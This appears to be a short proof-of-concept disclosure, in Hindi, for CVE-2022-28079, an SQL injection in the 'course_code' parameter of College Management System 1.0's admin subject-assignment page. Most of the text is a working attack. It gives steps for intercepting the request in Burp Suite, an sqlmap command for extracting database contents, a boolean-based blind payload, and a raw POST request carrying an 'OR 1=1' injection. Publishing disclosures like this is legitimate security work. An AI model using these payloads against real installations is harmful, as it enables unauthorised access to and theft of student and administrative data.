
CVE-2022-28079
कॉलेज प्रबंधन प्रणाली 1.0 /College-Management-System/admin/asign-single-student-subjects.php में पैरामीटर 'course_code' के माध्यम से SQL इंजेक्शन की अनुमति देती है। इस समस्या का शोषण करने से हमलावर एप्लिकेशन से समझौता कर सकता है, डेटा तक पहुँच या संशोधित कर सकता है, या अंतर्निहित डेटाबेस में अव्यक्त कमजोरियों का शोषण कर सकता है।
Burpsuite में प्रभावित पेज से 'course_code' पैरामीटर के साथ अनुरोध को इंटरसेप्ट करें और इसे poc.req के रूप में सहेजें। फिर डेटाबेस से डेटा निकालने के लिए SQLmap चलाएँ:
sqlmap -r poc.req --dbms=mysql
boolean-based blind Payload: submit=Press&roll_no=3&course_code=-6093' OR 2121=2121 AND 'ddQQ'='ddQQ
POST /College-Management-System/admin/asign-single-student-subjects.php HTTP/1.1
Host: localhost
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 80
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=jhnlvntmv8q4gtgsof9l1f1hhe
Referer: http://localhost/College-Management-System/admin/asign-single-student-subjects.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
submit=Press&roll_no=3&course_code=Select+Course%27+OR+1%3d1+OR+%27ns%27%3d%27ns